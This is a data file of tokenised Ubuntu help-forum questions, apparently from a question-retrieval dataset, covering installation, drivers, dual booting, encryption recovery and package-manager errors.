458005	how to tell if battery is dead using ubuntu	today i found an old asus ul30a laptop collecting dust in my office . the hard drive was missing and it seems the battery is dead , but i just so happened to have an ubuntu usb stick lying around so i plugged in the power cord and brought it to life . power statistics is showing the following info for the battery : my question is what , exactly , does this mean ? i suppose the battery is dead , but is this a situation where i can just buy a replacement battery , or does this indicate that something in the chain from charger to battery is genuinely damaged ? i should mention that , regardless of how long i leave it on the charger , the laptop immediately dies when i unplug it . thanks !
458009	switch language shortcut bug [ ubuntu 14.04 gnome ]	i use 2 languages : english and russian . languages âânormally switched on using the taskbar when using the keyboard shortcut icon changes its notation to another language but the language set does not change . how fix this problem ?
458011	where is /etc/sysconfig/iptables-config in 14.04	where is /etc/sysconfig/iptables-config in 14.04 i ca n't comment in this thread because i do not have a reputation of 50 configuration of iptables ( verfication , actives services , allow ftp )
458014	ssh server display motd instead of the banner set in /etc/ssh/sshd_config	my version of ubuntu is : description : ubuntu 12.04.4 lts release : 12.04 codename : precise i am try to setup my ssh server in order to display some warning message in the banner . i followed the guide found here by the followings : allowing the banner option in /etc/ssh/sshd_config banner /etc/issue.net and also service ssh restart then i tried to verify by duplicating my ssh session but my server gave me motd as always . any idea ? i thought it might be related to chmod yet after setting it to 777 still not working . root @ casalab-latitude-d530 : / # ls /etc/issue.net -alt -rwxrwxrwx 1 root root 1513 4ć 30 08:36 /etc/issue.net root @ casalab-latitude-d530 : / # thanks a lot . -- zota206
458016	have passphrase , do n't have wrapped_passphrase file	my hard drive decided to corrupt nearly the entire first gigabyte of itself . the superblocks/inode tables for that first gig were completely unreadable , and with that most of the os files were corrupt . it had a install of 14.04lts on it , an upgrade from 12.10 which did n't go too well , but the system was at least still usable . my ~/ was encrypted using ecryptfs , for which i do know the original passphrase that i entered during the install , however , i suspect the wrapped_passphrase file is gone for good . by passphrase , i mean the one where it asks you to enter it , not the `` long string of hex '' which i never actually noted ( because it was never shown to me ! ) backups were made of a lot of work stuff but there were some photos & documents in my so 's home directory that were not , which are irreplaceable . i 'm writing this from a livecd where i am running photorec ; so far it 's recovered about 5000+ .ecryptfs files and it 's barely halfway done . my question is this : is it possible to recreate the wrapped_passphrase and the .ecryptfs layout from the original install to get this stuff back ? i mean , if there 's no `` random '' elements and the key is created just from the passphrase+salt alone i should be able to recreate it . however i have a sinking feeling that this is n't the case ...
458017	disable unity search `` partners '' across all present and future user accounts	we would like to disable the unity default amazon and other partners search . i know this is easy to do for one account either through gsettings in terminal or under privacy in system settings . but is there a way to do it once and for all , so that no user accounts presently available , or user accounts in the future , have this setting enabled ?
458018	more modern or more conventional version of emacs	is there a more modern or more conventional version of emacs ? i 'm thinking something like aquamacs from mac os x. i 'd like the standard conventional keyboard shortcuts found in common programs to work to work and more organized menus with modern naming conventions . really i 'm just looking for an aquamacs like emacs for ubuntu . thanks
458019	trying to dual boot windows 8.1 + ubuntu 14.04 , but getting ready to completely wipe 8 first ?	i currently have windows 8.1 professional installed , and i 'm having the hardest time in the world trying to install ubuntu 14.04 , as it 's constantly telling me that `` there are currently no other operating systems installed . what do you want to do ? '' i 've followed articles on disabling secure boot in the bios , and turning off fast boot in windows 8 . this does n't solve anything for me ... i must be completely missing something . if i just wiped windows 8.1 , installed linux , and then installed windows 8.1 again + ubuntu 14.04 , can i just do something more simple after that to get things working the way i want ? i just simply want to dual boot windows 8.1 and ubuntu 14.04 , but all this new stuff is making this a pain ... edit : nevermind ... just rebooted windows 8.1 for like the 5th time and all of a sudden it 's allowing me to choose to install ubuntu alongside of windows 8.1
458020	how do i create a multi-bootable sd card ?	i am looking to make a backup & rescue micro-sd card for microsoft surface pro 2 which has a micro-sd slot built-in . i probably wo n't be able to choose just one solution to use as a rescue disk , and will want to create a multi-boot disk . i need to use flash card as a multi-bootable disk that i can also put disk image backups and other data on . i will at least need to back up a windows 8.1 installation . there are a lot of questions and tutorials for making ( multi- ) boot cds/dvds . what do i need to know about flash cards specifically , in comparison to cds/dvds ? in particular , which filesystem and bootloader will i need to use ; is anything else specific to flash cards ? i prefer an open-source cross-platform solution .
458021	slow connection with a broadcom bcm4318 wireless card	i recently upgraded to 14.04 . i just recently had an issue where my wifi would n't connect . i restarted the computer and it connected fine but now my wifi speeds are extremely slow . i saw a similar issue posted that said to use a script to provide info , which i 've provided below . where should i go from here ? http : //pastie.org/9125814 thanks for any help !
458024	can not implement due to missing api bittorrent sync error	i create i folder then sync my files to my mobile then i create a folder then sync to my laptop then copy the generated code , after that a check the info `` devices '' then it says `` can not implement due to missing api '' please help me guys thanks .
458027	does xubuntu include proprietary software ?	i am interested in installing xubuntu 14.04 on my computer , but i was wondering whether or not it comes pre-installed with copyrighted proprietary software such as codecs , flash , drivers , etc. ? i know you can install them through the ubuntu-restricted-extras package , or by checking `` install third-party software , '' but i know some of the ubuntu family includes codecs and things by default . so , my question is , does xubuntu come with codecs/proprietary software other than the ones in restricted-extras or through the installer ?
458031	error message about gtk in terminal	when i write some command on terminal , this error message appear firststrike @ ubuntu : ~ $ gksu ( gksu:6934 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( gksu:6934 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( gksu:6934 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( gksu:6934 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( gksu:6934 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( gksu:6934 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( gksu:6934 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( gksu:6934 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( gksu:6934 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( gksu:6934 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( gksu:6934 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( gksu:6934 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( gksu:6934 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( gksu:6934 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( gksu:6934 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( gksu:6934 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( gksu:6934 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( gksu:6934 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( gksu:6934 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( gksu:6934 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( gksu:6934 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , i have no idea about this , can anyone tell me if this a serious problem ?
458036	dual boot windows xp and ubuntu 14.04	i 'm new at linux , and i decided to try ubuntu . i had a ubuntu 12 dual boot installed using the windows installer and it seemed to work fine . now i can not find the same program online . i now try to dual boot ubuntu 14.04 with a usb and the message i get is : this computer currently has multiple operating systems on it . what would you like to do ? then i have an option of erasing my hard drive or manually partitioning it ( which i do not know how to do ) . this is the code i get when i go to the partition page : dev/sda1 fat32 8066 mb windows nt/2000/xp dev/sda2 ntfs 191979mb windows xp home edition why do n't i get the message for a dual boot like i used to ?
458040	incorrect nvidia x server settings	i am trying to configure an nvidia graphics card ( asus nvidia gt 218 geforce 8400 gs ) with a 1204 ubuntu machine ( 64 bit ) . the computer also contains its motherboard intel graphics card . i need this for multi-monitor display . i tried installing various nvidia drivers ( nvidia_170 , nvidia_304 , also the nvidia driver from the nvidia website ) , but the nvidia x-server settings gui does n't seem to recognize any of the drivers . on the left panel , i only see two tabs ( 1 ) application profiles and ( 2 ) nvidia-settings configuration . i expected to see something like x screen 0 .. ( see https : //www.google.com/search ? q=nvidia-settings & source=lnms & tbm=isch & sa=x & ei=qwjgu8xsgjxqsqtejyaq & ved=0cagq_auoaw & biw=1855 & bih=983 ) also , i get the following message when i type nvidia-settings on the command prompt . ** ( nvidia-settings:2705 ) : warning ** : prime : failed to execute child process `` /usr/bin/prime-supported '' ( no such file or directory ) ** message : prime : is it supported ? no ! [ enter image description here ] [ 1 ] i suspect that the driver is clashing with the existing motherboard driver , causing it to work improperly . could anyone please suggest what i am doing wrong ?
458041	find x-window name	i am using a script called sendkeys ( https : //github.com/kyoto/sendkeys ) which i want to use to send keyboard strokes to skype . i am able to get sendkeys to works perfectly with pluma ( a text editor ) and google chrome . send keys works by sending keys to the name of an x-window , e.g . : bash sendkey.sh 'google chrome ' control+v i can send keys to google chrome by supplying the window 'google chrome ' or 'chrome ' and for pluma 'pluma ' ( lower case . ) however i am not able to send anything to skype . i do not know if this is because of a compatability issue or because i ca n't find out the name of the window . can anyone suggest how you determine the name of a x-window ? or failing that suggest another way i may be able to send keyboard strokes to skype .
458042	how to integrate of python 2.7.4 in qt 5.0	i have python 2.7.4 installed , qt 5.0 installed , pyqt 4.10.4.tar.gz and sip 4.15.5.tar.gz . how can i integrate python with my qt ?
458046	synergy -- i have four monitors ( 2x2 ) but i can only get to my other computer via one	i have four monitors that are in this order : 23 14 however , i have a second computer with a monitor to the left of my first and second monitors . i can only get to that desktop by moving my mouse from monitor 2 to the left ... yet , i can still move the mouse from the other computer to monitor 1 on my computer . is there any way to fix this ?
458047	sh file , direct access	i 'm new to ubuntu and i 've just installed android studio ( it was a .sh file along with a bunch of other files and folders ) i went and did ./studio.sh ( as the readme stated ) and it worked . however , once i closed the program i can not see it on `` applications '' . the only way to run it again is to go to the directory and click on the .sh file again ( which is very impractical ) ca n't i create an icon somewhere ? or maybe stick it on the dock ( the simple right-click 'keep in dock ' wo n't work ) . how do you manage these things ?
458048	macbook pro 11,1 wo n't start after closed lid on ubuntugnome 14.04	i have gnome ubuntu dual booted on my macbook pro 11,1 . after closing the lid i ca n't get it to start up again . after 20 seconds sometimes it will turn back on but it does n't seem to recognize the lid opening right away . any ideas ?
458050	qt4 interface not working for vlc	this is what happens if i try to run vlc : main libvlc : running vlc with the default interface . use 'cvlc ' to use vlc without interface . main interface error : option qt-volume-complete does not exist skins2 interface error : no suitable dialogs provider found ( hint : compile the qt4 plugin , and make sure it is loaded properly ) skins2 interface error : can not instantiate qt4 dialogs provider i tried the command vlc -vv for more details , and apparently the qt4 ui fails to load because there is an undefined symbol : _mali_clz_lu it used to work until a few days ago . i 've tried removing and installing both vlc and qt4 in all sorts of different ways ( also deleting old config files and any kind of cache ) , what else can i do ?
458051	since installing 14.04 lastpass intermittently fails to allow login	sometimes unless i disable lastpass → restart → enable lastpass → restart firefox lastpass will not accept my password login . this has happened about five or six times in approximately forty firefox starts . i have not had this experience in the several years of various ubuntu flavours . any ideas to find the problem and a fix will be most welcome .
458052	increase the size of the arrow notifier indicating multiple open windows in different workspaces	i often spread work in different workspaces , and have multiple windows of the same application ( example , nautilus , emacs ) open in each workspace . these are indicated by the arrow ( solid or transparent ) marks beside each launcher icon . however the current arrow marks are quite small ( unless you increase the size of the icons ) . therefore , it is difficult to distinguish between one or two arrow marks . so is there a way to increase the size of these arrow marks ? update : i have added a screenshot , hopefully the question would be clearer .
458053	why bash history is corrupted and how to recover it ?	today after upgrading to ubuntu 14.04 ( from 13.10 ) , i pressed the key on my laptop ( dell inspiron n4010 ) keyboard which is designed to decrease lcd backlight intensity . this key and its opposite ( which increases lcd backlight intensity ) was working without any problem in 13.10 , but today after pressing this key about 5 times , backlight intensity decreased step-by-step by each press and after 6th press a strange thing happened : the screen become black ( with backlight is on ) and the mouse pointer doubled in size and was frozen on bottom of the screen . it seems like the situation in which display driver stops working properly ! ! ! i waited for about 5 minutes and no thing occurred . everything was frozen . so i turned off my laptop by holding down power button and after restart when i opened a terminal command line history data was something like this : ��^e^l����j2h�ju^v4���r��^w� i opened .bash_history file by gedit and it was corrupted ! ! ! now i like to know why my command line history is corrupted and how to recover it ? also there is another symptom on my laptop just after upgrading to 14.04 ! which may help : that is after restarting and entering my user password to login to my session , the screen is corrupted for 1 second and become normal again . `` corrupted '' i mean it is pixelated and pixel size is about 30x30 lcd pixels .
458061	how do i install python through the terminal ?	i figured out my problem guys . i had to downlowd eclipse , and it ran through that . sudo apt-get install eclipse sorry about my lack of info . : )
458063	sound settings not work on 14.04 but i have sound	fresh 14.04 install . everything was fine in 13.10. lspci -v | grep -a7 -i `` audio '' 00:1b.0 audio device : intel corporation 82801i ( ich9 family ) hd audio controller ( rev 02 ) subsystem : gigabyte technology co. , ltd device a002 flags : bus master , fast devsel , latency 0 , irq 47 memory at fa200000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel 00:1c.0 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 1 ( rev 02 ) ( prog-if 00 [ normal decode ] ) -- 01:00.1 audio device : nvidia corporation gf114 hdmi audio controller ( rev a1 ) subsystem : cardexpert technology device 0801 flags : bus master , fast devsel , latency 0 , irq 17 memory at f7000000 ( 32-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel 03:00.0 sata controller : jmicron technology corp. jmb363 sata/ide controller ( rev 02 ) ( prog-if 01 [ ahci 1.0 ] ) i can hear sound , but the sound settings show no soundcard . there is no indicator until i uncheck and check the `` show sound volume in menu bar '' but then it show just muted , sliders have no effect . media key are also not working . it `` thinks '' there is no soundcard even when it is working . sidequestion : whats are this audio controllers on new graphics cards ? are there just to pass the sound from the real soundcard to the hdmi cable or is it actually a real soundcard in there ?
458064	activate click through mode on conky	is it possible to use conky theme as click through on desktop ? . i can use conky as transparent . but i ca n't directly access files on desktop because ca n't click through it . any idea ? . thanks .
458071	ubuntu software center and update manager is not working	my update manager is not working and showing the message e : the package adobereader-enu : i386 needs to be reinstalled , but i ca n't find an archive for it .
458074	ubuntu 12.04 64 bits + nvidia gt 540m	i have a dell notebook , model xps 502l , with nvidia gt 540m graphic card . it works fine using ubuntu 12.04 32 bits and additional drivers from nvidia installed . after a hd crash , i installed ubuntu 12.04 64 bits , but when i install nvidia drivers ( currently version 311 ) , i have two issues : 1 ) on login screen , the mouse cursor show up on the top-left corner , not centered on the screen as usual ; 2 ) using the notebook , and at aleatory intervals , the cursor freezes sudenly . sometimes , when i close the notebook and open it , the cursor works again , but in some cases , i need restart the system . anybody have an idea to help me ?
458077	using windows programs or alternatives ?	i am an advanced beginner who has been tempted to try ubuntu by two friends who program . my major question is about using windows programs . the ones i use most are quicken , family tree maker , last pass , and dragon speech . will these work in ubuntu or are there alternatives ?
458080	unable to get any version of ubuntu to run , except 12.10	i have wiped the terabyte hard drive of my desktop to perform a clean dual boot install of windows 7 alongside ubuntu . i have dual booted this machine in the past without issue . unfortunately , the only version that will install in a stable fashion is 12.10 and i 'm aware that support is soon to be discontinued . i have tried 12.04 lts and 14.04 lts ( 32 and 64 bit ) . i 'm installing from usb . i 'm able to install every time but the system crashes at the splash screen or just after log in to the system . in every case the crash is followed by weird graphics and necessitates a hard reboot . prior to this clean install i had recently attempted to upgrade to 13.10 but had frequent crashes with the same odd graphics behavior so i went back to 12.10 . i 'm able to install and run windows 7 which has been stable on this machine . there are no performance issues playing media or running games via steam so there does not seem to be any major hardware issue . obviously i 'm hopeful someone can help , but i 'm also very curious as to why 12.10 is completely stable and no other version of ubuntu is on this system . system spec 's as follows : amd athlon ii 3100mhz , quad core 4gb ram nvidia geforce 6150se graphics card thanks in advance .
458081	nvidia video screen tearing ( proprietary driver )	i am getting near-constant screen tearing when watching videos on my ideapad y400 , with nvidia gt 650m graphics ( not the sli model ) . i am using the proprietary 337 drivers from xorg-edgers , but the same effects happened with 304 ( and 313 , i think ) . i use ubuntu 13.10 and i3wm . enabling and disabling opengl vsync in nvidia-settings makes no difference . i do n't see any other relevant options . i have tried both vlc and the built-in `` videos '' application , and both suffer screen tearing . the tearing does not occur when i run windows . i have not tried another monitor , as i ca n't get hdmi-out to work ( i have n't tried vga ) . do y'all have any ideas ? note : as i have swapped among various versions of noveau and proprietary drivers , the tty 's have changed appearance a bit . at the moment , they appear to be correct except for two vertical lines of slight blurriness -- 2px off from the right horizontal resolution ?
458084	virtual box intel vt-x error	i tried to access the acceleration tap under system under settings and i can not . the tab is greyed out like their is no data available .
458085	failed to upgrade 13.10 to 14.04	i ran the command sudo apt-get install & sudo apt-get dist-upgrade -d it gives the following output nitesh @ nitesh : ~ $ sudo apt-get upgrade [ sudo ] password for nitesh : reading package lists ... done building dependency tree reading state information ... done the following packages have been kept back : checkbox-qt chromium-browser chromium-browser-l10n dconf-editor easystroke firmware-b43-installer gambas3 gambas3-gb-opengl gambas3-gb-opengl-glsl gambas3-gb-opengl-glu gambas3-gb-pdf gambas3-gb-sdl gambas3-gb-sdl-sound gnome-commander gnome-icon-theme-full gnome-online-accounts gnome-panel gnome-panel-data gnome-session-flashback gstreamer0.10-plugins-ugly gstreamer1.0-libav gstreamer1.0-plugins-ugly gtk2-engines-pixbuf katepart kde-runtime kdelibs5-plugins kget libaacs0 libcairo-perl libchromaprint0 libclutter-gst-1.0-0 libcodeblocks0 libdate-calc-xs-perl libffmpegthumbnailer4 libfftw3-3 libgcr-3-1 libglib-perl libgtk2-perl libkactivities-bin libkactivities-models1 libkactivities6 libkatepartinterfaces4 libkonq-common libkonq5abi1 libktorrent5 libkxmlrpcclient4 libnepomukcleaner4 libnepomukcore4abi1 libnepomukwidgets4 libnspr4-0d libpango-perl libqapt2 libschroedinger-1.0-0 libsdl-image1.2 libspandsp2 libssh2-1 libwxgtk2.8-0 linux-generic linux-headers-generic linux-headers-generic-pae linux-image-generic nepomuk-core-runtime ntrack-module-libnl-0 plasma-scriptengine-javascript python-imaging-compat python-pyexiv2 python3-pyatspi2 python3-software-properties python3-virtkey software-properties-common software-properties-gtk synaptic unity unity-services xserver-xephyr 0 upgraded , 0 newly installed , 0 to remove and 75 not upgraded . nitesh @ nitesh : ~ $ now what should i do please help me .
458086	12.04lts to 14.04lts : no menu-bar/launcher after logout/login	the solution here works for me to fix the desktop after log-in : http : //askubuntu.com/a/292997/227118 , but i am back to square one after logging out . how to solve this issue permanently ?
458088	how to tell if graphics processing in ubuntu is utilizing hardware acceleration	may i know how i could tell if graphics processing ( 3d , video encode/decude ) in ubuntu is utilizing hardware acceleration ( ie . using gpu ) . is there a utility to tell ? thank you for the suggestions and pointers .
458089	software center shows that google docs has been installed	i made a gmail to message the owners of a blog i follow because some of their recent posts seemed like personal attacks . after i messaged them i have no reply and they deleted my disqus post on their site . i just noticed google docs had been installed on my machine . i looked it up in the history section of software center and it says it was installed at 5:25 p. m. on tuesday . anything i can do to catch these hackers ?
458090	dual boot windows 8 and ubuntu in secure uefi mode	is it possible to dual boot windows 8 and ubuntu in secured uefi mode. ? if possible which version of ubuntu is supportive ? and how ?
458092	silently install ubuntu using wubi - wubi frontend modification	i am trying to silently install ubuntu using wubi . when i start wubi.exe on windows , a dialog box comes which asks for user information like username , password , etc . i want to skip this dialog box i.e . i want to by pass this step . instead of entering the user information in the dialog box , i want to hard code these values ( somewhere in the wubi ) so that on starting wubi.exe should automatically install ubuntu ( actually i want to do silent install using wubi ) . in the wubi source the frontend files are available under src/wubi/frontends/win32/ . `` installation_page.py '' is the page for the dialog box . user information is getting passed from this page to some other page and after that the `` progress_page.py '' is getting called and after that `` installation_finish_page.py '' . thanks .
458095	manufacturers serial number of the hard drive	i need to get manufacturers serial number of the hard drive . in windows i got following results , c : \ > wmic diskdrive get serialnumber serialnumber 2020202057202d44435759415255393xxxxxxxxx how can i check this from ubuntu terminal ? edited : when i used hdparm -i /dev/sda command its giving os given id , not the manufacturers id . it is similar to windows command vol c : . but in my case i need to find the 40 digits manufactures serial number .
458100	12.04 lts - nautilus top viewing bar changed recently - how do i get it back ?	i 'm running 12.04 lts with gnome - no effects ui . when going into a directory in nautilus , until recently i would see along the top of a nautilus window a line of icons showing the directory path leading to where i was at the moment , and i could very easily navigate back and forth through the directory structure by clicking on these icons . for example , if i was in \home\downloads\netbeans\archives i would see along to the top of the window icons : |home|downloads|netbeans|archives and could go back and forth between the directories very easily just by clicking on these little icons - i 've always really liked that . now , just recently , either because of some `` upgrade '' or something i messed up , i have a windows style `` explorer '' ui in nautilus , which i do n't like , and to make matters worse , no back button . to navigate around directories i have to go over to the `` explorer '' tree and muck around . i see that in the file/open dialog of some applications , this view is still available : note the icons |mikey111|devgo|gosqlite|src along the top of the dialog box . i want to get back the directory style viewing i used to have in nautilus . how do i do this ? am i getting something mixed up ? was this always just in the dialogs but never in nautilus itself ?
458101	what is the appropriate command line to connect through ssh ?	i would like to connect to my remote machine through ssh command line , but i do n't know what are the appropriate terminal commands . i always get an error `` connection refused '' .
458102	how to automate the process of executing a command upon creation of a file	how to automate the process of executing a command upon creation of a file . i have an application wherein a tool generates an xsd schema from a xml file . my next module uses this xsd schema for further processing . i want to automate this process i.e . to run a command once the file is generated . this application will run everyday on ubuntu machine so i want to automate it . i do n't want any human intervention in this process . i did search inotify lib which is used for similar purposes but it forces me to change the enitre design of my system . are there any other alternatives which would solve this purpose ? any help is highly appreciated .
458103	dual boot ubuntu with windows 8	i have installed ubuntu 14.04 on my pre-installed windows 8 lenovo g580 . but after installing ubuntu , it 's grub does n't show windows8 in it . can any one help me . thank you .
458112	installing oxford switch ipack3	my system is a brand new ubuntu 14.04 lts . i installed oxford switch ipack3 straight from original dvd . it did install ... but wo n't execute . double-clicking on the switch ipack3 installer will render simply no action at all . the file is marked as executable in the 'properties ' tab . the same dvd will work 'out of the box ' on other linux distributions , but not on ubuntu 14 ... by now . can anyone help me install this educational material ? thanks in advance .
458113	how to correct sudo apt-get update errors	when i was trying to make apt update terminal show this errors e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/extras.ubuntu.com_ubuntu_dists_quantal_main_i18n_translation-en e : the package lists or status file could not be parsed or opened . how i must going to correct this ?
458115	sluggish windows 7 after dualbooting with ubuntu 12.04	three to four months ago i started using dual booting my computer , so i could choose whether i would like to boot up in windows 7 or ubuntu 12.04 . when i boot up in windows , it takes a long time before the login screen appears . when i log in , it then takes a long time to actually log in . the first minutes of use the computer is sluggish , and it keeps being a bit slow ( perhaps that is what one can expect for windows ? ) . the weird thing is that windows 7 has not always been slow , it is a more recent issue . when i first started using dual boot , windows was not sluggish at all . my windows 7 installation is a clean installation without all the pre-installed software ( crapware ) . my ubuntu 12.04 runs as fast as it did when it was installed the first time . what causes windows to be so sluggish ?
458116	wrong subtitle timing with devede	i am trying to create a dvd with devede . i have correctly synchronized subtitles with gnome subtitles and tested it in vlc and kaffeine , but when i encode a video with devede the subtitles are wrongly timed/unsynchronized . with gnome subtitles i synchronized for pal and with devede i have created pal video ( selected default as pal , and also in file properties ) . if it helps i am trying to convert an avi file with .srt subtitles . i am using ubuntu 14.04 64-bit , with the latest devede , the latest libav-tools and mate desktop environment . what can cause this problem or how to fix it ? thank you .
458117	missing date & time from top panel of unity desktop - ubuntu 14.04	i 'm using ubuntu 14.04 an my machine and since the last upgrade from 13.10 to 14.04 the date & time is missing in the top panel of unity . this machine was originally installed with ubuntu 12.10 . i upgraded it from 12.10→13.04 , from 13.04→13.10 and last week from 13.10→14.04 . i tried every solution found in this question : missing date & time from top panel of unity desktop . but nothing of all this works : - ( i tried the following things : reinstalling indicator-datetime sudo apt-get remove -- purge indicator-datetime and install it again sudo dpkg-reconfigure -- frontend noninteractive tzdata sudo killall unity-panel-service and of course log out/log in again and so on ... where can i find log files for the indicator or where could help me otherwise with this problem ? trying to debug : $ locate indicator-datetime-service /usr/lib/x86_64-linux-gnu/indicator-datetime/indicator-datetime-service $ /usr/lib/x86_64-linux-gnu/indicator-datetime/indicator-datetime-service indicator-datetime-message : indicator-datetime exiting ; failed/lost bus ownership
458119	tata photon not connecting on installed version of ubuntu but on live cd ?	i recently installed ubuntu 14.04 lts on my laptop , and then used my tata photon plus ( cdma ) connection , and then yesterday i downloaded ubuntu sdk and stuff on my laptop as i remember and then created a wifi hotspot , after that i left the pc and when came back my internet connection got disconnected , after that i plugged my photon out and then re-inserted it , and then the tata photon ( cdma ) connection was n't detected , instead 2 new mobile broadband ( gsm ) connection poped up , i tried to set that up too , but it did n't work , the customer care department said its a fault from my system and not theirs ... internet works perfectly in live cd boot ! ! ! ! but not on installed ubuntu ! ! ! ! . plz help me ... ... i do n't want to erase my drive and install ubuntu again ...
458122	kde does not notice laptop running on battery	after upgrading to kubuntu 14.04 , kde does not notice that the laptop is running on battery ! the battery icon continues to show the 'charging ' symbol . but the battery level shown in the icon keeps reducing as i use the laptop . when i hover the mouse on the icon , the tooltip displays the battery level as 50 % , 40 % , 19 % etc . when the battery goes down to low level ( 20 % as defined in system settings - > power - > advanced settings ) , there is no warning . the same is the case when the battery goes to the critical level . how can i set this right ?
458126	blank screen after updating to 14.04	since i upgraded to 14.04 , i can not login to ubuntu `` normally '' anymore . a blank screen with the mouse cursor is shown , nothing else . i can login only if i choose the safety terminal mode , in the login screen . in this case , the graphical mode starts , but only displays a xterm , which i can use to launch other programs , like google chrome . tried the steps in this post , but nothing worked . appreciate any help . please let me know if ( and how ) i should provide more details to help solving this issue . thank a lot , ricardo
458127	apei generic hardware error	the following error message is shown while installing ubuntu 13.10 hardware error : hardware error from apei generic hardware error source 0 hardware error : apei generic hardware error status hardware error : severity : 1 , fatal hardware error : section : 0 , severity : 1 , fatal hardware error : flags : 0x01 hardware error : fru_text : uncorrectederr hardware error : section_type : pcie error hardware error : command : 0x0010 , status : 0x0147 hardware error : device_id : 0000:00:00.0 hardware error : slot : 0 hardware error : secondary_bus : 0x00 hardware error : vendo_id : 0x1077 , device_id : 0x7322 hardware error : class_code : 00060c kernel panic - not syncing : fatal hardware error ! rebooting in 30 seconds
458128	is available swap memory important in my case ?	i 've read a little bit about swap memory , but i do n't understand it enough to make a decision on trying to look into this more on my system . here 's what i have available right now : user @ ubuntu : $ free -m total used free shared buffers cached mem : 15932 11505 4427 104 1315 6719 -/+ buffers/cache : 3470 12462 swap : 0 0 0 should i be concerned that i have no swap memory available ?
458129	how to add maas node with out pxe boot	i 've installed ubuntu 14.04 maas controller node on a physical m/c . i want to add another physical m/c to this maas controller . i do n't have control over setting dhcp . our router does n't support any pxe support and i ca n't change the dhcp setting at my router . is there any other way to add m/c to maas controller ? thanks in advance .
458130	usb is not showing on df -h but it shows on lsusb	i have a desktop pc its usb port was working 2 days before but now its not working on lsusb it shows ( sandisk corp ) but it is not mounted and it also not showing in df -h or on the disk utiltiy please give me a solution
458132	which is exact method to install from source ?	i have run ( gradually ) following command to install gdebi from source : apt-get build-dep gdebi apt-get source gdebi cd gdebi-0.9.5.3 dpkg-buildpackage -uc -us -b which gives me error ( posted last few lines , ask me to post whole if needed ) : fail test_against_deb_with_conflict_against_apt ( tests.test_gdebi_cli.gdebiclitestcase ) ... this package is uninstallable conflicts with the installed package 'apt' ok test_against_impossible_dep ( tests.test_gdebi_cli.gdebiclitestcase ) ... this package is uninstallable dependency is not satisfiable : pkg-that-does-not-exists ok test_against_that_works_with_no_additonal_deps ( tests.test_gdebi_cli.gdebiclitestcase ) ... ok test_pyflakes3_clean ( tests.test_pyflakes.testpyflakesclean ) ... ok test_pyflakes_clean ( tests.test_pyflakes.testpyflakesclean ) ... ok ====================================================================== fail : test_lintian ( tests.test_gdebi_gtk_lintian.gdebigtktestcase ) -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- traceback ( most recent call last ) : file `` /usr/lib/python3.4/unittest/mock.py '' , line 1125 , in patched return func ( *args , **keywargs ) file `` /media/pandya/ext4/14.04/manual/package-mgt/gdebi/gdebi-0.9.5.3/tests/test_gdebi_gtk_lintian.py '' , line 61 , in test_lintian self.assertmultilineequal ( lintian_output.strip ( ) , expected_lintian_output ) assertionerror : 'warning : the authors of lintian do not re [ 658 chars ] us 1 ' ! = 'e : error-package : changelog-file-missing- [ 575 chars ] us 1' - warning : the authors of lintian do not recommend running it with root privileges ! e : error-package : changelog-file-missing-in-native-package e : error-package : file-in-etc-not-marked-as-conffile etc/foo e : error-package : control-file-has-bad-owner postinst egon/egon ! = root/root e : error-package : no-copyright-file e : error-package : package-has-no-description e : error-package : no-maintainer-field w : error-package : no-section-field w : error-package : no-priority-field e : error-package : wrong-file-owner-uid-or-gid etc/ 1000/1000 e : error-package : wrong-file-owner-uid-or-gid etc/foo 1000/1000 w : error-package : maintainer-script-ignores-errors postinst lintian finished with exit status 1 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ran 7 tests in 12.827s failed ( failures=1 ) make [ 1 ] : *** [ override_dh_auto_test ] error 1 make [ 1 ] : leaving directory `/media/pandya/ext4/14.04/manual/package-mgt/gdebi/gdebi-0.9.5.3' make : *** [ build ] error 2 dpkg-buildpackage : error : debian/rules build gave error exit status 2 so , what is i 'm missing ? if it is not proper method , then give me proper method to install from source .
458136	closing of ubuntu one	since ubuntu one closes i want to delete all files and download all contacts . how can i do that ? do i need to something else after all data are removed from the cloud ?
458137	lap wont boot after deleting windows7 partition	while i was using ubuntu i accidently deleted the windows7 partition . when i rebooted i got the following error : error : unknown file system , entering rescue mode , grub rescue > i 've tried to reinstall ubuntu , windows7 but the windows set up is loading files after that the windows logo is blinking forever , on ubuntu-install ubuntu option selected but system freezes . `` ls '' command is used in the grub rescue > it results the hard disk partitions as ( hd0 ) ( hd0 , msdos15 ) ... ( hd0 , msdos5 )
